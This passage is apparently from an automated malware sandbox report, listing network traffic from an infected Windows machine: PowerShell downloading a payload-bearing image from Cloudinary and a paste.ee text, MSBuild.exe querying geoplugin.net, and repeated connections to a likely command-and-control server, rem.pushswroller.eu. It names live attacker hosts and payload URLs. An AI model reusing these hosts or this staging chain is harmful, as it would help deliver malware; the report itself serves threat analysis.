                                                                                                                      Dec 9, 2024 16:34:35.783278942 CET4978323101192.168.2.645.80.158.30
                                                                                                                      Dec 9, 2024 16:34:35.903311014 CET231014978345.80.158.30192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:36.732717991 CET8049790178.237.33.50192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:36.732778072 CET4979080192.168.2.6178.237.33.50
                                                                                                                      Dec 9, 2024 16:34:53.948318958 CET231014978345.80.158.30192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:53.949615955 CET4978323101192.168.2.645.80.158.30
                                                                                                                      Dec 9, 2024 16:34:54.069037914 CET231014978345.80.158.30192.168.2.6
                                                                                                                      Dec 9, 2024 16:35:23.971616030 CET231014978345.80.158.30192.168.2.6
                                                                                                                      Dec 9, 2024 16:35:23.973701000 CET4978323101192.168.2.645.80.158.30
                                                                                                                      Dec 9, 2024 16:35:24.093432903 CET231014978345.80.158.30192.168.2.6
                                                                                                                      Dec 9, 2024 16:35:53.965034008 CET231014978345.80.158.30192.168.2.6
                                                                                                                      Dec 9, 2024 16:35:53.966305017 CET4978323101192.168.2.645.80.158.30
                                                                                                                      Dec 9, 2024 16:35:54.087354898 CET231014978345.80.158.30192.168.2.6

                                                                                                                      UDP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Dec 9, 2024 16:34:04.253113985 CET6454153192.168.2.61.1.1.1
                                                                                                                      Dec 9, 2024 16:34:04.563345909 CET53645411.1.1.1192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:14.187222004 CET5324553192.168.2.61.1.1.1
                                                                                                                      Dec 9, 2024 16:34:27.473082066 CET5677253192.168.2.61.1.1.1
                                                                                                                      Dec 9, 2024 16:34:27.831240892 CET53567721.1.1.1192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:31.241107941 CET5291153192.168.2.61.1.1.1
                                                                                                                      Dec 9, 2024 16:34:31.572860956 CET53529111.1.1.1192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:34.222373962 CET5751553192.168.2.61.1.1.1
                                                                                                                      Dec 9, 2024 16:34:34.364759922 CET53575151.1.1.1192.168.2.6

                                                                                                                      DNS Queries

                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Dec 9, 2024 16:34:04.253113985 CET192.168.2.61.1.1.10xda1Standard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 9, 2024 16:34:14.187222004 CET192.168.2.61.1.1.10xcf59Standard query (0)tse1.mm.bing.netA (IP address)IN (0x0001)false
                                                                                                                      Dec 9, 2024 16:34:27.473082066 CET192.168.2.61.1.1.10x157eStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                                                      Dec 9, 2024 16:34:31.241107941 CET192.168.2.61.1.1.10x67bStandard query (0)rem.pushswroller.euA (IP address)IN (0x0001)false
                                                                                                                      Dec 9, 2024 16:34:34.222373962 CET192.168.2.61.1.1.10xb9f6Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                                                      DNS Answers

                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Dec 9, 2024 16:33:57.613066912 CET1.1.1.1192.168.2.60xa0aeNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 9, 2024 16:33:57.613066912 CET1.1.1.1192.168.2.60xa0aeNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                      Dec 9, 2024 16:33:59.987168074 CET1.1.1.1192.168.2.60xfa3fNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                      Dec 9, 2024 16:33:59.987168074 CET1.1.1.1192.168.2.60xfa3fNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                      Dec 9, 2024 16:34:04.563345909 CET1.1.1.1192.168.2.60xda1No error (0)res.cloudinary.comcloudinary.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 9, 2024 16:34:04.563345909 CET1.1.1.1192.168.2.60xda1No error (0)cloudinary.map.fastly.net151.101.1.137A (IP address)IN (0x0001)false
                                                                                                                      Dec 9, 2024 16:34:04.563345909 CET1.1.1.1192.168.2.60xda1No error (0)cloudinary.map.fastly.net151.101.65.137A (IP address)IN (0x0001)false
                                                                                                                      Dec 9, 2024 16:34:04.563345909 CET1.1.1.1192.168.2.60xda1No error (0)cloudinary.map.fastly.net151.101.129.137A (IP address)IN (0x0001)false
                                                                                                                      Dec 9, 2024 16:34:04.563345909 CET1.1.1.1192.168.2.60xda1No error (0)cloudinary.map.fastly.net151.101.193.137A (IP address)IN (0x0001)false
                                                                                                                      Dec 9, 2024 16:34:06.932796001 CET1.1.1.1192.168.2.60x74b7No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 9, 2024 16:34:06.932796001 CET1.1.1.1192.168.2.60x74b7No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                      Dec 9, 2024 16:34:14.616420031 CET1.1.1.1192.168.2.60xcf59No error (0)tse1.mm.bing.netmm-mm.bing.net.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 9, 2024 16:34:14.616420031 CET1.1.1.1192.168.2.60xcf59No error (0)ax-0001.ax-msedge.net150.171.27.10A (IP address)IN (0x0001)false
                                                                                                                      Dec 9, 2024 16:34:14.616420031 CET1.1.1.1192.168.2.60xcf59No error (0)ax-0001.ax-msedge.net150.171.28.10A (IP address)IN (0x0001)false
                                                                                                                      Dec 9, 2024 16:34:18.432468891 CET1.1.1.1192.168.2.60xc838No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 9, 2024 16:34:18.432468891 CET1.1.1.1192.168.2.60xc838No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                      Dec 9, 2024 16:34:27.831240892 CET1.1.1.1192.168.2.60x157eNo error (0)paste.ee172.67.187.200A (IP address)IN (0x0001)false
                                                                                                                      Dec 9, 2024 16:34:27.831240892 CET1.1.1.1192.168.2.60x157eNo error (0)paste.ee104.21.84.67A (IP address)IN (0x0001)false
                                                                                                                      Dec 9, 2024 16:34:31.572860956 CET1.1.1.1192.168.2.60x67bNo error (0)rem.pushswroller.eu45.80.158.30A (IP address)IN (0x0001)false
                                                                                                                      Dec 9, 2024 16:34:34.364759922 CET1.1.1.1192.168.2.60xb9f6No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                      Dec 9, 2024 16:34:38.228648901 CET1.1.1.1192.168.2.60x9593No error (0)g-bing-com.ax-0001.ax-msedge.netax-0001.ax-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 9, 2024 16:34:38.228648901 CET1.1.1.1192.168.2.60x9593No error (0)ax-0001.ax-msedge.net150.171.28.10A (IP address)IN (0x0001)false
                                                                                                                      Dec 9, 2024 16:34:38.228648901 CET1.1.1.1192.168.2.60x9593No error (0)ax-0001.ax-msedge.net150.171.27.10A (IP address)IN (0x0001)false

                                                                                                                      HTTP Request Dependency Graph

                                                                                                                      • res.cloudinary.com
                                                                                                                      • paste.ee
                                                                                                                      • geoplugin.net

                                                                                                                      HTTP Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.649790178.237.33.50807704C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 9, 2024 16:34:34.492017984 CET71OUTGET /json.gp HTTP/1.1
                                                                                                                      Host: geoplugin.net
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Dec 9, 2024 16:34:35.733115911 CET1171INHTTP/1.1 200 OK
                                                                                                                      date: Mon, 09 Dec 2024 15:34:35 GMT
                                                                                                                      server: Apache
                                                                                                                      content-length: 963
                                                                                                                      content-type: application/json; charset=utf-8
                                                                                                                      cache-control: public, max-age=300
                                                                                                                      access-control-allow-origin: *
                                                                                                                      Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                                                                      Data Ascii: { "geoplugin_request":"8.46.123.228", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                      HTTPS Proxied Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.649714151.101.1.1374432020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-09 15:34:05 UTC127OUTGET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1
                                                                                                                      Host: res.cloudinary.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-12-09 15:34:06 UTC803INHTTP/1.1 200 OK
                                                                                                                      Connection: close
                                                                                                                      Content-Length: 2230233
                                                                                                                      Content-Type: image/jpeg
                                                                                                                      Etag: "7b9a6708dc7c92995f443d0b41dbc8d0"
                                                                                                                      Last-Modified: Mon, 02 Dec 2024 10:22:29 GMT
                                                                                                                      Date: Mon, 09 Dec 2024 15:34:06 GMT
                                                                                                                      Strict-Transport-Security: max-age=604800
                                                                                                                      Cache-Control: public, no-transform, immutable, max-age=2592000
                                                                                                                      Server-Timing: cld-fastly;dur=145;cpu=1;start=2024-12-09T15:34:06.067Z;desc=miss,rtt;dur=169,content-info;desc="width=1920,height=1080,bytes=2230233,o=1,ef=(17)",cloudinary;dur=131;start=2024-12-09T15:34:06.077Z
                                                                                                                      Server: Cloudinary
                                                                                                                      Timing-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                      x-request-id: 6f487a4c60d72621f2efeecff85ca20a
                                                                                                                      2024-12-09 15:34:06 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                                      Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                                      2024-12-09 15:34:06 UTC1378INData Raw: 77 24 91 80 f7 ed aa 38 13 c5 74 2e 92 f9 a4 19 c0 50 c1 95 13 cc f4 aa d7 4f e2 f4 f6 cf 9a 34 12 6a 34 d1 ac 34 c0 35 95 3d b3 e9 ff 00 b5 df 0d 9e 5f 16 d1 c2 37 3c 8c ae 62 55 46 b2 4b 70 2d 85 9e 48 cf 03 04 29 1a 02 c8 cb 27 e1 22 e8 8f 87 f3 c0 63 45 08 87 48 b1 94 0b b9 a8 91 99 9a b8 22 87 5d 10 0c cd 1b b7 a8 92 00 02 e8 d6 6a e9 8a 5b 07 65 52 c0 a8 46 37 fa 62 5a 9d 3c 47 59 18 29 b4 1d c3 d2 47 3f 4c 09 9f 4f a7 74 d3 90 78 2c c0 37 bf 3c 73 8a 10 92 a8 46 da b2 2c 8a a8 77 71 9b 83 4e 8f 0a 82 ab ed c1 ac ce 7f 04 8d 35 22 50 e5 08 6b aa b1 81 68 b5 2c ec eb e5 80 55 14 32 31 a5 53 75 63 e7 97 d6 cd 1e a2 6d 36 91 ee de 4f 55 76 14 79 07 0b 2b 22 ef 72 88 c0 2f a9 8a 8e 6b 31 f4 8c da ed 7c d2 10 5c 85 3b 2c d5 0a 23 a6 06 b8 8b 6f 90 b0 bc
                                                                                                                      Data Ascii: w$8t.PO4j445=_7<bUFKp-H)'"cEH"]j[eRF7bZ<GY)G?LOtx,7<sF,wqN5"Pkh,U21Sucm6OUvy+"r/k1|\;,#o
                                                                                                                      2024-12-09 15:34:06 UTC1378INData Raw: 8c cd 80 06 22 88 00 fb 74 c5 c6 89 f4 fe 2d 26 ab ef 2f e5 b0 1e 8a 15 d3 03 7b ef a3 82 6d 4f 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed 26 a4 45 1f aa 31 d4 a9 e0 1f 6c cd 97 c4 4b c9 2b 9e 77 31 20 fd 71 4d 32 2f 84 e8 00 6d cc e7 80 7b 9f 8e 27 14 ca fc 0f c3 cf 24 60 3a 67 91 e4 34 0b 1a be b9 07 54 77 8b e0 11 ef df 04 93 a2 2b 51 f5 1e 2b e1 99 7a 9d 2e ac 78 92 ce 35 2d f7 72 2b cb a1 5f 3c 0d 4d 46 b0 24 43 7b
                                                                                                                      Data Ascii: "t-&/{mO| mv%sb_4{fIj[hutzq|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE&E1lK+w1 qM2/m{'$`:g4Tw+Q+z.x5-r+_<MF$C{
                                                                                                                      2024-12-09 15:34:06 UTC1378INData Raw: 66 6d 4b f8 66 a7 61 05 96 26 b5 23 f1 70 73 f3 be ae 35 fb ac f2 15 01 99 ef 9e a3 9e d9 f5 ef 18 fb 5d a0 0b 26 92 09 a3 77 64 65 26 fe 07 fe bf ae 7c 9f 57 2c 6f e1 f2 21 70 ae ac 0d 7b e0 62 6c 20 6e 07 80 31 dd 33 bb 44 39 b3 7c 83 8a 79 8d b8 86 e0 1e 31 9d 15 14 65 07 a6 03 88 18 2d 95 5e 72 e2 32 ca 6d 45 1c ac a8 16 35 3b e8 8c a9 d4 24 41 44 8e 59 8f 4e 0e 01 3c b5 58 f6 8b 5a 3c 57 4c 80 be e2 fe 63 38 92 e0 90 f4 3a d6 5c be c4 0e ce 02 81 f9 e0 42 26 e0 56 94 1f 6c 23 82 aa 2d 54 0d c4 8f 8e 29 06 b5 25 76 51 e8 3d af be 32 1d 5c 6d 2c 09 1d f0 0f 13 72 3a 7d 71 b5 72 07 52 7e 03 33 d0 d6 da 3c f7 c6 44 6b d2 46 56 37 55 7d 0e 01 0c 8f 24 8a 63 ba f6 03 bf b6 3a 74 d3 3c 51 3c 60 33 49 b7 d3 e9 0c 2f a1 da 1b 77 36 39 34 39 1e f9 5d 14 f0 e9
                                                                                                                      Data Ascii: fmKfa&#ps5]&wde&|W,o!p{bl n13D9|y1e-^r2mE5;$ADYN<XZ<WLc8:\B&Vl#-T)%vQ=2\m,r:}qrR~3<DkFV7U}$c:t<Q<`3I/w6949]
                                                                                                                      2024-12-09 15:34:06 UTC1378INData Raw: 02 f2 41 e0 62 ed a9 02 44 70 8a c0 0b 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db e3 95 f2 8b 03 5c 0e f8 0b 30 55 21 42 96 63 d1 47 7c 22 e8 dc 95 79 9d ae ec 20 6e 07 cf 0e a8 ab ca a5 03 d0 e5 e2 47 67 a2 2e b0 07 20 26 43 e9 ed c7 1f d7 2a 51 c2 9b 5e b8 47 23 71 04 51 ca 16 24 71 80 22 18 70 16 b2 e8 8c 48 39 60 bc d0 be 7a d6 6a 78 57 86 2e b9 a5 56 b5 0a bf 89 7a 86 c0 48 0f 49 17 47 2b b5 98 10 1b 93 c0 cf 56 3c 0f 47 c3 04 90 81 41 bd 46 c9 ae bc 63 71 e8 74 b1 a8 03 4d 18 ae fb 45 fe 67 03 c2 18 66 d3 b5 14 60 4f 3e ae f9 74 0c ec 41 5c f7 6f a7
                                                                                                                      Data Ascii: AbDpfcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
                                                                                                                      2024-12-09 15:34:06 UTC1378INData Raw: f1 15 94 48 14 8d b6 ca df a7 03 e9 f1 cc df b0 9a 89 a3 d3 7d a7 48 0c aa 4f 84 33 7a 05 9a 12 c4 39 ae db 49 07 e1 78 6f b5 a3 56 df b4 cd 42 6a db 6c ad a8 85 db 71 e8 19 51 81 f8 0a 38 1e fb ed 9c ba 65 d2 cd f6 82 49 4c da 88 d8 68 f4 fb a3 2c b1 f9 91 ee 2f 67 f1 10 a1 80 1d 8b 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98 ea 15 46 9d 41 55 2d c8 a1 f9 74 c4 92 09 9f 4c c3 d4 a4 44 a1 94 25 7a 87 23 a9 e4 f1 97 58 35 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b
                                                                                                                      Data Ascii: H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCK
                                                                                                                      2024-12-09 15:34:06 UTC1378INData Raw: 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48 fc 4a c2 b0 3d e6 a7 ed f6 98 ea 3f 79 a6 90 83 de c0 c9 3f 6c 74 82 88 d3 b8 53 ec dc e7 cf a5 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb f0 9f b5 be 11 e1 d3 4b 20 4d 43 bc c7 73 6e 6b 0a 7d 80 ac cd 30 69 b5 3e 96 d2 a3 12 3f 10 ea 33 16 5f 04 d4 0d 63 46 8b 69 d4 37 41 81 bf e3 9f 6c e5 d4 f8 a4 53 78 74 af 0c 51 0d db 4d 90 cd ec 46 7a 78 be de e8 bc a5 59 f4 ec d2 6c 05 88 60 05 9f 60 73 c1 41 e0 b1 23 7e f8 b3 f1 cf 6a 39 a9 f7 7d 24 6a 0b a0 07
                                                                                                                      Data Ascii: 8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j
                                                                                                                      2024-12-09 15:34:06 UTC1378INData Raw: 93 c3 b9 dc ee 49 76 31 34 6a b8 dc 05 11 d7 8b bc 70 f8 b6 92 49 de 46 2e 1e 55 62 e4 a2 90 58 83 c9 1d f8 24 59 b3 de f3 0e 69 7c cd a2 ec 2a 95 51 55 42 c9 fa f5 38 17 95 15 a4 31 a2 aa b2 83 6b 1d 91 c5 d9 b2 7d b2 da 77 31 22 d4 65 b7 b1 50 7d c8 af ee 30 63 51 21 05 4b 02 0d d9 2a 09 e7 ad 1a b1 91 1c 92 aa 00 ad 41 4e e0 3d 8f 1f db 01 89 35 3b c0 20 15 db de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7
                                                                                                                      Data Ascii: Iv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*
                                                                                                                      2024-12-09 15:34:06 UTC1378INData Raw: 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a
                                                                                                                      Data Ascii: Ux+,NG*)UeUefI"w-n2^2@*%2idutDCH=$WsSw4]GI@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{
                                                                                                                      2024-12-09 15:34:06 UTC1378INData Raw: 20 86 62 6f b7 53 95 e9 c1 c0 bc 8f be be 19 5d c4 8a ed 90 7e 1d 32 39 c0 90 48 37 9c 4d 9c e1 d7 9e 99 6a 5f 2e ef d5 7d 3e 18 10 8a 5d c2 8e a7 8c 69 34 c5 24 56 24 30 0d 46 b1 55 b1 ea 1d 46 31 16 a9 92 68 d9 85 aa 90 6b 01 c1 a3 1f 78 16 c0 03 ea 1c d1 c0 ea a1 47 d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4
                                                                                                                      Data Ascii: boS]~29H7Mj_.}>]i4$V$0FUF1hkxGcf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.649772172.67.187.2004432020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-09 15:34:29 UTC67OUTGET /r/TZC1n/0 HTTP/1.1
                                                                                                                      Host: paste.ee
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-12-09 15:34:29 UTC1280INHTTP/1.1 200 OK
                                                                                                                      Date: Mon, 09 Dec 2024 15:34:29 GMT
                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: max-age=2592000
                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                      x-frame-options: DENY
                                                                                                                      x-content-type-options: nosniff
                                                                                                                      x-xss-protection: 1; mode=block
                                                                                                                      content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                                                      CF-Cache-Status: HIT
                                                                                                                      Age: 32538
                                                                                                                      Last-Modified: Mon, 09 Dec 2024 06:32:11 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MykZe9uLkyv4566L5twBm95km77X6s2uBiYx1LITcMZgv5YQUeh4C3rArIVFvD2XnnK2Z8KM0paC2P8cEmJpO0BvzBcVGjXjfC8d6CiFxdGipg145kiV5bI9Aw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8ef60f414939c454-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
